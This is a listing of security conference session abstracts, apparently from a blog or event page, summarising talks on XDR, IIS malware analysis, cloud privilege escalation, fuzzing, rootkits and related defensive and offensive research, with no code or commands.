XDR and SIEM on a Collision Course: What Remains When the Dust Settles?

Detection and response is ripe for disruption or at least better tool integration. In this context, XDR makes sense as a means to help security analysts reduce dwell time and conduct more threat hunting. Looking ahead, how do security operations change, and what is the role of SIEM, SOAR, EDR, and NDR in an XDR […]

Read more

Security Operations and the End of Cyber Risk

Cyber risk is a business risk. Unfortunately, the cybersecurity industry has shown an effectiveness problem in reducing it for organizations. Every year new technologies, vendors, and solutions emerge, and yet despite this constant innovation we continue to see high profile breaches in the headlines. In this session we will cover the practical approaches you can […]

Read more

Detection at Scale – Realize Cyber Resilience Using Intelligence-Driven XDR

Is your lack of automation holding your threat intelligence, security operations, and the rest of your organization back? Many of today’s organizations understand the value of intelligence-driven extended detection and response or XDR but are running into challenges when leveraging it. Anomali’s Chief Product Officer, Mark Alba, will share how XDR allows you to identify […]

Read more

Many Stunts, One Design: A Crash Course in Dissecting Native IIS Malware

Internet Information Services (IIS) is a Microsoft web server software for Windows with an extensible, modular architecture, allowing developers to replace or extend core IIS functionality. This session looks at how the same extensibility is misused by malicious threat actors to intercept or modify network traffic flowing through the IIS servers. These powers allow IIS […]

Read more

How We Automated Ourselves Out of On-Call Burnout … and You Can Too!

The repetitive nature of response tasks is one of the biggest causes of fatigue and burnout among Incident Responders. Anyone who’s been on-call on a Security team can remember how many hours they’ve spent opening the same tabs, clicking the same buttons, copy+pasting the same indicator data, and performing other similar tasks repeatedly. Imagine if […]

Read more

Secure and Scalable Development with Microsoft 365 and Azure AD

In this talk we’ll focus on leveraging Azure AD in Platform as a Service projects. We’ll start with Logic Apps as a no-code Web API platform for implementing your privileged code in a zero-trust architecture. Azure AD provides secure authentication between low-trust client-side code and Logic Apps, and Logic Apps should use delegated or service […]

Read more

JavaScript Obfuscation – It’s All About the Packers

The use of JavaScript obfuscation techniques has become prevalent in today’s threats. From phishing pages to Magecart, supply chain injection to JavaScript malware droppers, they all use JavaScript obfuscation techniques on some level. The use of JavaScript obfuscation enables evasion from detection engines and poses a challenge to security professionals, as it hinders them from getting […]

Read more

BioHackers: The Invisible Threat

Biohackers exist and walk among us. Most security professionals would not allow users into their environment with offensive security tools. How do you address individuals who have surgically implanted such devices into their bodies? I have multiple sub-dermal implants that range from NFC, HID/Prox and RFiD devices. This allows me to become the attack vector. […]

Read more

The Quantum Threat: Where Are We Today?

Quantum computers will break currently deployed public-key cryptography (RSA, ECC, Diffie-Hellman, etc.) which is one of the pillars of modern-day cybersecurity. Thus, we need to migrate our systems and practices to ones that cannot be broken by quantum computers before large-scale quantum computers are built. First, I will give an update on the “quantum threat-timeline”. […]

Read more

Redefining Threat Modeling: Security Team Goes on Vacation

Threat Modeling is an important part of every company’s Security Development Lifecycle, but as development teams grow bigger, Security will have to choose which features they want to Threat Model or they will become a bottleneck for the development organization. What if I told you, you could have your cake and eat it too? It […]

Read more

Epic journey of an enterprise cloud transformation

This session delivers two different real-life examples of an enterprise cloud transformation with emphasis on security implementation. You will get an insight into security architecture details across three main categories: security and data privacy integration bottom-up, applying security in depth by peeling down the layers of defense, and breaking down the setup of secure cloud […]

Read more

The Cross-Disciplinary Challenges of Data Governance Policies

Numerous data governance laws and policies have been enacted to protect user privacy. Polices may define data retention (how long the data must be kept), data purging requirements (when the data must be destroyed), and data consent (whether the data can be used for a particular purpose). To comply with these requirements and to minimize […]

Read more

Software Composition Analysis 101: Knowing What’s Inside Your Apps

The term Software Composition Analysis (SCA) is relatively new to the security world. However, similar approaches have been used since the early 2000s to indicate security verifications on open-source components. SCA has become an evolution of that. It is the process of identifying and listing all the components and versions present in the code and […]

Read more

An Anatomy of a DevOps Tool Chain Attack

Businesses are building their digital transformation strategies around in-house development and embracing the DevOps philosophy and associated tooling. However, DevOps tooling is commonly insecure by default, misconfigured and rely on the open-source community to keep things up to date and secure. While cyber security folks are catching up with how to secure the Cloud and […]

Read more

Sandboxing in Linux with Zero Lines of Code

Linux seccomp is a simple, yet powerful tool to sandbox running processes and significantly decrease potential damage in case the application code gets exploited. It provides fine-grained controls for the process to declare what it can and can’t do in advance and in most cases has zero performance overhead. The only disadvantage: to utilise this […]

Read more

Zero-Code Data Validation

It’s 2021, so why are developers still spending so much time writing custom code to validate data? Does the custom code cover all vulnerabilities? Is it secure? This presentation introduces a new open-source framework called Sanitation Web Application Firewall (SanWAF) that uses a declarative approach to validate data on both the client and server tiers. […]

Read more

Breaking the Laws of Robotics: Attacking Automated Manufacturing Systems

Automated manufacturing systems (particularly within the paradigm of so-called Industry 4.0) are complex and critical cyber-physical systems. They use robots (highly sophisticated systems themselves, with multiple complex embedded controllers), several types of industrial controllers, and are often interconnected with other computers in the factory network, safety systems, and to the Internet for remote monitoring and […]

Read more

Hacking & Securing Clinical Technology

This talk highlights the security challenges of securing the clinical and IT infrastructure of healthcare delivery organizations. We’ll dive into two examples of FDA approved devices that connect to clinical equipment common in hospitals today and walk the audience through the development of full device compromise and the discovery of multiple CVEs.

Read more

Automating Threat Detection and Response with Azure Sentinel

As more businesses move to Azure for their cloud computing, there is a growing gap in visibility of the security of cloud resources. Azure Sentinel is the cloud native SIEM solution from Microsoft. Turning it on potentially means another location for piles of logs and noise. Attend this session to learn how to get the […]

Read more

Common NGINX Misconfigurations That Leave Your Web Server Open to Attack

NGINX is the web server powering one-third of all websites in the world. Detectify’s Security Research team analyzed almost 50,000 unique NGINX configuration files downloaded from GitHub with Google BigQuery and discovered common misconfigurations that, if left unchecked, leave your web site vulnerable to attack. This training will walk through the most common issues, including […]

Read more

Broken Brokers in Boxes: Fuzzing Breaks Everything, Even Erlang

Behind the scenes of a trio of recently disclosed vulnerabilities are two innovations. First, putting fuzzing targets in containers makes memory exhaustion much easier to observe. Second, widening our definition of failure makes it possible to locate vulnerabilities even in “safe” environments like Erlang. This presentation begins with a brief review of fuzzing, focusing on […]

Read more

Harder, Better, Faster, Stronger – Privacy Laws and the Anatomy of a Breach Response

In late 2020, the Canadian government proposed the Digital Charter Implementation Act, intending to modernize the framework for the protection of personal information in the private sector. Stemming from this Act, the Privacy Commissioner of Canada is set to receive more power to investigate privacy infractions and issue orders and fines. Simultaneously, Ontario is developing […]

Read more

Moving Upstream, Securing the GitOps Workflow

A recent study suggests that cloud misconfiguration is the number one risk to cloud environments in 2021. As more developers deploy infrastructure across clouds using infrastructure-as-code, the security risk is only going to grow. To quote Albert Einstein: “Intellectuals solve problems, geniuses prevent them.” With IaC, we have an opportunity to scalably prevent security risks […]

Read more

Introducing a New Construct for Advanced Interactive Volatile Memory Analysis

Malware continues to advance in sophistication and prevalence. Well-engineered malware can obfuscate itself from the user, network, and even the operating system running host-based security applications. One place malware cannot easily hide itself is within volatile computer memory (RAM). Although an essential part of detection engineering and exploit development, memory analysis is not trivial to […]

Read more

Speeding Up AWS IAM Least Privileges with CloudSplaining & Elastic Stack

In talking about Cloud Security, I believe that there are 3 main points to take care of: IAM Permissions, Control Plane Configuration (AWS API), and Cloudtrail for Control Plane Monitoring. When we are talking about Cloud Misconfiguration, Permissions, and Monitoring, we are mostly talking about second stage attacks (unless some configurations that make information public) […]

Read more

Explore Adventures in the Underland: Forensic Techniques Against Hackers

Cybercrime is a very lucrative business not just because of the potential financial return, but because it is quite easy to get away with it. Sometimes hackers get caught, but most of the time they still run free. When it comes to the operating system and after-attack traces, it is not that bad as all […]

Read more

Adventures in Underland: What Your System Stores on the Disk Without Telling You

Even though you are the only person using a computer, you are not the only one writing to your disk drive! Surprisingly, your disk drive contains a lot of juicy information that can reveal a lot of secrets and history about what you did in the past. There are also places where data can be […]

Read more

Attacker Techniques: Data Exfiltration

Data exfiltration, or data theft, is a common event that occurs during a breach. This talk will go into detail on specific tools and techniques that attackers have used to exfiltrate data from victim organizations and the ways that we can identify evidence of data access, data staging or data theft. By understanding how attackers […]

Read more

Building Security Champions

With security teams being vastly outnumbered many organizations have responded to this challenge with different program scaling methods, including building security champions programs. Which leads us to questions: How does a security champions program work? How do you select your champions? And once you have them, what do you DO with them?  This session will […]

Read more

Maturing your toolkit with mental models

Ask anyone about “infosec tools” and the list will depend on red/blue perspective and experience but will usually include the likes of BloodHound, Metasploit, Burp, Mimikatz, Cobalt Strike, Nmap, and Netcat. These are all great but, too often we ignore that there is a separate side to infosec: there is a “non-technical” dimension we all […]

Read more

hAFL1: Our Journey of Fuzzing Hyper-V and Discovering a 0-Day

In this session, we present hAFL1 and provide the implementation bits required to write a Hyper-V fuzzer. We uncover a critical 0-day in Hyper-V vmswitch which was found using our fuzzer – an arbitrary read vulnerability. Finally, we show a live demo of exploiting this vulnerability, which until only a few weeks ago could take […]

Read more

Full Circle Detection: From Hunting to Actionable Detection

How do you create new efficient, accurate, and resilient detection rules? There are a lot of steps to follow. This talk will take you through what I call Full Circle Detection. I’ll start with where to get hunting ideas and then to giving a turnkey alert for your Security Analysts using a real-world step by […]

Read more

FAIL – Notorious* Number 9

Lessons learned over the course of a protracted global emergency that has fundamentally altered society and how we do business are not being well learned and are not yet reflected in how we manage and assess our work. Time to talk through the 9th round of fails with our panel of distinguished guest speakers!

Read more

Large-Scale Security Analysis of IoT Firmware

Today, the number of IoT devices in both the private and corporate sectors are steadily increasing. IoT devices like IP cameras, routers, printers, and IP phones have become ubiquitous in our modern homes and enterprises. To evaluate the security of these devices, a security analysis must be performed for every single device. Since manual analysis […]

Read more

Ghost Misdetection Attacks Against Tesla Model X & Mobileye 630 PRO

Many studies have discussed the implications of using a training process to develop artificial intelligence: the significant computing capabilities required, the energy wasted, the high cost, the time required for training, the size of the dataset needed. However, the fact that automated driving is considered safer than manual driving proves that the training process is […]

Read more

Detecting Illicit Drone Filming

In an “open skies” era in which drones fly among us, a new question arises: how can we tell whether a passing drone is being used by its operator for a legitimate purpose (e.g., delivering pizza) or an illegitimate purpose (e.g., peeking at a person showering in his/her own house)? In this talk, I present […]

Read more

Drinking Coffee, Unicorns & Demystifying Zero Trust

So exactly what is zero trust? Buzzword, unicorn technology or a framework with meat on the bone? Well, yes on two counts. Zero trust is the realization that everything is on fire. In this talk I will endeavor to strip the idea of a zero trust program back to the bare metal. We will have […]

Read more

Compliant Yet Vulnerable: Critical Risks of Measuring Instruments in Production Line

In this talk, we are going to review the LAN eXtensions for Instrumentation (LXI), a common protocol among testing and measuring devices. Most legacy wired protocols function on the assumption that they are interconnected in a closed, trusted, secure network. However, once connected to the internet this assumption is no longer true. LXI is one […]

Read more

Threat Hunting Intelligently

Although times are unprecedented, for threat actors, it is business as usual. Even as times change, good threat intelligence will always be a bedrock of cybersecurity. Join Senior Security Research Consultant and Secureworks’ Threat Hunting lead Ryan Cobb, as he shares what’s on the threat horizon and how the Secureworks team is there to keep […]

Read more

A Savvy Approach to Leveraging MITRE ATT&CK

MITRE ATT&CK has shifted the balance of power from attackers to defenders. For the past few years, defenders have been increasing their security tooling and are detecting more adversarial techniques than ever before. Detecting events in your environment is only the first step. Going forward the focus isn’t going to be on if you detect […]

Read more

PKI Well Revised: Common Mistakes Which Lead to Huge Compromise of Identity

All technologies and systems currently use cryptography and most use certificates at some point. Since their boom, internal PKI systems have not changed a lot nor have the problems that we observe during almost all pentests. It’s time to revise your knowledge about one of the cornerstones of enterprise security and learn a few tricks […]

Read more

An Introduction to Automotive Security in 2020

As cars continue to become more connected and autonomous, the security of these systems grows in importance. We’re now a decade away from the first public research on automotive security, and since then the challenges of securing these vehicles has increased due to new features. connectivity, and automation. In this talk, we’ll provide an introduction […]

Read more

Escaping Virtualized Containers

Containers offer speed, performance, and portability, but do they actually contain? While they try their best, the shared kernel is a disturbing attack surface: a mere kernel vulnerability may allow containerized processes to escape and compromise the host. This issue prompted a new wave of sandboxing tools that use either unikernels, lightweight VMs or userspace-kernels […]

Read more

Practical Defenses Against Adversarial Machine Learning

Adversarial machine learning has hit the spotlight as a topic relevant to practically-minded security teams, but noise and hype have diluted the discourse to gradient-based comparisons of blueberry muffins and chihuahuas. This fails to reflect the attack landscape, making it difficult to adequately assess the risks. More concerning still, recommendations for mitigations are similarly lacking […]

Read more

Identifying and Defending the Perimeter With Attack Surface Management

The need to operate online has driven businesses toward a digital transformation with cloud adoption at its core. The pace of this transformation sped up drastically as COVID-19 dispersed entire workforces and business operations around the world. In a matter of days, operating a business with an entirely “at home” workforce became the norm. And […]

Read more

Using Threat Metrics for Better Information Security Program Efficacy – Leveraging MITRE ATT&CK

Information Security leaders face a problem: to prove the value equation of their security investments. Security efficacy is often brought up as a key challenge – not just how to leverage technology, but how to measure what results it delivers. Enumerating how many detections were surfaced by a malware defense platform or if a perimeter […]

Read more

Security Transformed

Preceding the outbreak of COVID-19 was a trend across industries to transform the traditional IT stack into a new form of computing, one that was focused on enabling agility and innovation while also delivering cost reduction. This shift sought to leverage public cloud and cloud-like development methods as well as infrastructure design. The effort to […]

Read more

How to Automate Security Validation and Reduce Enterprise Security Risk

Cybersecurity software has evolved by leaps and bounds in the past decade. However, one domain was neglected and has fallen behind – security validation. Today, the measurement of a network’s cyber posture is done in a manual, non-scalable way, through costly 3rd-party pentesting service providers. As a result, a huge gap has been created between […]

Read more

Lateral Movement and Privilege Escalation in GCP; Compromise any Organization without Dropping an Implant

Google Cloud’s security model in many ways is quite different from AWS. Spark jobs, Cloud Functions, Jupyter Notebooks, and more default to having administrative capabilities over cloud API’s. Instead of defaulting to no capabilities, permissions are granted to default identities. One default permission these identities have is called actAs, which allows a service by default […]

Read more

Demystifying Modern Windows Rootkits

This talk will demystify the process of writing a rootkit, moving past theory and instead walking the audience through the process of going from a driver that says “”Hello World”” to a driver that abuses never-before-seen hooking methods to control the user-mode network stack. Analysis includes common patterns seen in malware and the drawbacks that […]

Read more
Subscribe to the Sector Blog
Enter your contact information below to have future blog posts delivered directly to your inbox!